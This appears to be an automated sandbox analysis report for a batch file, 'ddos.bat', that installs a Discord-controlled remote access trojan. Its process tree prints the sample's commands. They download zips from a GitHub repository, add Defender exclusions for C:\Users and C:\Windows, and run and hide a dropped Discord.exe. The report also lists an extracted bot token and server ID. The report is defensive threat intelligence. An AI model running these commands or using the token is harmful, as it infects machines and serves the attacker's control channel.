Analysis
-
max time kernel
1677s -
max time network
1151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
23-10-2024 16:29
Static task
static1
Behavioral task
behavioral1
Sample
ddos.bat
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
ddos.bat
Resource
win10v2004-20241007-en
General
-
Target
ddos.bat
-
Size
1KB
-
MD5
15ee8aecfc89d8bed8f362cb46e4b8bb
-
SHA1
c39b884897d73006daa07d29264670d181835624
-
SHA256
7af1c25851ef3f66cbca82540d35470de8a364a469d00a013891bd211f56e082
-
SHA512
553a78c7e82669145767747c287244c2e253a938f7379feaf71425e5f4eeedc612157f812d7d723c3edc57d6f534f152714f173e3b10e55331b16b8f741a3b66
Malware Config
Extracted
discordrat
-
discord_token
MTI5Njg5NDEwMjY0NTkwMzQwMA.GffxcT.wWuk4gdi5T-RNzCLfFQ4XgAEMO4ZjpXcRu5E5Y
-
server_id
1293738586679672945
Signatures
-
Discord RAT
A RAT written in C# using Discord as a C2.
-
Blocklisted process makes network request 4 IoCs
Processes:
powershell.exepowershell.exeflow pid Process 23 3112 powershell.exe 25 3112 powershell.exe 29 2880 powershell.exe 31 2880 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid Process 2668 powershell.exe 1596 powershell.exe 3808 powershell.exe 3112 powershell.exe 2880 powershell.exe 2596 powershell.exe 412 powershell.exe -
Executes dropped EXE 1 IoCs
Processes:
Discord.exepid Process 2016 Discord.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
Processes:
flow ioc 31 raw.githubusercontent.com 24 raw.githubusercontent.com 25 raw.githubusercontent.com -
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid Process 1596 powershell.exe 1596 powershell.exe 3112 powershell.exe 3112 powershell.exe 3808 powershell.exe 3808 powershell.exe 2596 powershell.exe 2596 powershell.exe 412 powershell.exe 412 powershell.exe 2668 powershell.exe 2668 powershell.exe 2880 powershell.exe 2880 powershell.exe -
Suspicious use of AdjustPrivilegeToken 8 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeDiscord.exedescription pid Process Token: SeDebugPrivilege 1596 powershell.exe Token: SeDebugPrivilege 3112 powershell.exe Token: SeDebugPrivilege 3808 powershell.exe Token: SeDebugPrivilege 2596 powershell.exe Token: SeDebugPrivilege 412 powershell.exe Token: SeDebugPrivilege 2668 powershell.exe Token: SeDebugPrivilege 2880 powershell.exe Token: SeDebugPrivilege 2016 Discord.exe -
Suspicious use of WriteProcessMemory 30 IoCs
Processes:
cmd.execmd.execmd.exedescription pid Process procid_target PID 1144 wrote to memory of 1596 1144 cmd.exe 85 PID 1144 wrote to memory of 1596 1144 cmd.exe 85 PID 1144 wrote to memory of 3028 1144 cmd.exe 87 PID 1144 wrote to memory of 3028 1144 cmd.exe 87 PID 1144 wrote to memory of 740 1144 cmd.exe 88 PID 1144 wrote to memory of 740 1144 cmd.exe 88 PID 1144 wrote to memory of 3112 1144 cmd.exe 91 PID 1144 wrote to memory of 3112 1144 cmd.exe 91 PID 1144 wrote to memory of 428 1144 cmd.exe 96 PID 1144 wrote to memory of 428 1144 cmd.exe 96 PID 1144 wrote to memory of 2656 1144 cmd.exe 97 PID 1144 wrote to memory of 2656 1144 cmd.exe 97 PID 2656 wrote to memory of 3808 2656 cmd.exe 99 PID 2656 wrote to memory of 3808 2656 cmd.exe 99 PID 2656 wrote to memory of 2596 2656 cmd.exe 101 PID 2656 wrote to memory of 2596 2656 cmd.exe 101 PID 2656 wrote to memory of 412 2656 cmd.exe 102 PID 2656 wrote to memory of 412 2656 cmd.exe 102 PID 2656 wrote to memory of 2188 2656 cmd.exe 103 PID 2656 wrote to memory of 2188 2656 cmd.exe 103 PID 2188 wrote to memory of 2668 2188 cmd.exe 105 PID 2188 wrote to memory of 2668 2188 cmd.exe 105 PID 2188 wrote to memory of 2880 2188 cmd.exe 106 PID 2188 wrote to memory of 2880 2188 cmd.exe 106 PID 2188 wrote to memory of 2960 2188 cmd.exe 112 PID 2188 wrote to memory of 2960 2188 cmd.exe 112 PID 2188 wrote to memory of 2016 2188 cmd.exe 113 PID 2188 wrote to memory of 2016 2188 cmd.exe 113 PID 2188 wrote to memory of 5088 2188 cmd.exe 114 PID 2188 wrote to memory of 5088 2188 cmd.exe 114 -
Views/modifies file attributes 1 TTPs 2 IoCs
Processes:
attrib.exeattrib.exepid Process 740 attrib.exe 5088 attrib.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ddos.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1144 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -window hidden -command ""2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1596
-
-
C:\Windows\system32\cacls.exe"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"2⤵PID:3028
-
-
C:\Windows\system32\attrib.exeattrib +h "Anon" /s /d2⤵
- Views/modifies file attributes
PID:740
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-Webrequest 'https://github.com/bonsko216/1/raw/refs/heads/main/1.zip' -OutFile 1.zip"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3112
-
-
C:\Windows\system32\tar.exetar -xf 1.zip2⤵PID:428
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Anon\1.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:2656 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -window hidden -command ""3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3808
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Add-MpPreference -ExclusionPath "C:\Users3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2596
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Add-MpPreference -ExclusionPath "C:\Windows3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:412
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Anon\2.bat"3⤵
- Suspicious use of WriteProcessMemory
PID:2188 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -window hidden -command ""4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2668
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-Webrequest 'https://github.com/bonsko216/1/raw/refs/heads/main/Discord.zip' -OutFile Discord.zip"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2880
-
-
C:\Windows\system32\tar.exetar -xf Discord.zip4⤵PID:2960
-
-
C:\Users\Admin\AppData\Local\Anon\Discord.exeDiscord.exe4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2016
-
-
C:\Windows\system32\attrib.exeattrib +h "C:\Users\Admin\AppData\Local\Anon\Discord.exe" /s /d4⤵
- Views/modifies file attributes
PID:5088
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
268B
MD5cdb8a5fcca6c6b2ac156c95610dd62b0
SHA1fc9143fbdfc511193d627682d03da517ef03eac0
SHA256c99e311f09fdc9a371c67971575f59962dc1d5bb02afdcff72d74d0b3ede34df
SHA512b1eded36047153fe99fb8fe4e29667d6aefe3431d1de1669f364fa185584bf6fbfff5cd7f10bc7a56f9f055e350276ac4219e737836873b5c542927c317814f9
-
Filesize
661B
MD515af212f6b388a57510af30146ea51f8
SHA19833f92d882d8e69bd453bdb2f3feda15d961c0f
SHA25662b1f7ab4fcf8a68f31afd384c8d1f1d46124991e1d5d19ea04eece62a63a897
SHA51290614fcb1c43df3d46c5d76bfcb777f9a276507e9a6a6a59d5e248e9de04b681656b5417e84758a78848580ca252c1ab07509102c924d2c67a42f419f294ea05
-
Filesize
327B
MD59cbac74f137243a22af973eacd90de31
SHA13260ea401134322fe037a35b685c66a0793c3658
SHA256567296eeadb0e5463e11abc4f05b6617d72944a382d0202cb0cc6954d2a17465
SHA512e729d873c6fd9af96092831ad7efc1fb5deca094fd48a4cc3874ce0c7a6814f97bb7c737393d1755b495dfd91791206d7ba6f8c8d51150ccf698f49627a23e60
-
Filesize
51KB
MD585f1a70f2760fc2b1c9dd2e11d178548
SHA1c92415eb189ebb19efa29a1be6eeea7421d2eabc
SHA2569c3a2642864d1680716134111aa3ce37cf1f99829a4d8301b4972230358389ec
SHA512f5a8e36d502992f733dd5473d6146bd0a1b3f17a7377b62f2f628318cccf9cec236ea6bac268d9a4377ea12cd4d984f4b59553d4c5de2481bcb710f20d5a2aef
-
Filesize
45KB
MD56c33dba78cdd4a159b34c812616bfa6a
SHA18e486a8492e7b782762c08765572da921435a759
SHA2560c92eb7b8f6dcf63ee71137c8f3908382e4d4010e2d3a55b4b8036e86260f47a
SHA512afe6084e6f50fe26796083a293bd79a82c06d42880657c5e9055bb52677d43cbe12a63134c2dae0259c1f6f6f70bd6ea3237f3cd3665f6e0d3118ff70c225581
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
64B
MD550a8221b93fbd2628ac460dd408a9fc1
SHA17e99fe16a9b14079b6f0316c37cc473e1f83a7e6
SHA25646e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e
SHA51227dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0
-
Filesize
1KB
MD51dffbab5ecc6d06e8b259ad505a0dc2a
SHA10938ec61e4af55d7ee9d12708fdc55c72ccb090c
SHA256a9d2e6d35c5e9b94326042c6f2fe7ef381f25a0c02b8a559fc1ee888ccffb18e
SHA51293209a16400574416f6f992c2d403acc399179fc911818c4967c9a0211924486878578d1c98ba3bc9e269012603c96ab118a291bf53c57d8af9ab48f9e7b9b76
-
Filesize
64B
MD55cbe3a0a17b04ba77056b67c58d61799
SHA148f02445cc4d7e81f443a518476112ee6260fe04
SHA256061bd1792b76653ea413c300df4751262146c1011ceb334a08e06cd29f8487ba
SHA51241cee31b5f9deae99fb3024ba94fa2b064766b7d01cd07de103db9e0462a168ac7ebe6e6331d0d5ef4c4f44b69d56df1702de2849138563555f97a415aa25847
-
Filesize
944B
MD596ff1ee586a153b4e7ce8661cabc0442
SHA1140d4ff1840cb40601489f3826954386af612136
SHA2560673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8
SHA5123404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569
-
Filesize
944B
MD5c379be8f6ce687f5a2c8dac5a9b3b3ac
SHA1c0572a1f0a028c85ee3d3ea87e1528266bb30df6
SHA256331e39665e058e6b7009277e4a1df1501f337f1d4d3490cc23f3f26dc7b2c832
SHA512342bb54c99b0d02792747e4a7eb408fa444d0045fafac0292e9524526351a50073b0cd18d9e3f2860698dc9e00e9acf5bcd220c1e8dfa57652fb2d230940bb74
-
Filesize
64B
MD50daaa4b7703b4fb87bea729ac852fc43
SHA130b32a58bd7b46b98dfd325d2012c59e38cfee31
SHA25668c7e73641893801fd9d57aafc68c73f89175b6a360193bb16092c19b1478c4d
SHA5121916546231c4bf8fcaa272efea61cc61f24f6e2f64e036dd9425bcf06df2d645e6375a0e1029d9d6a170c1a1d331fc3a18ffae2da965f12074b3b0e3ebed3159
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82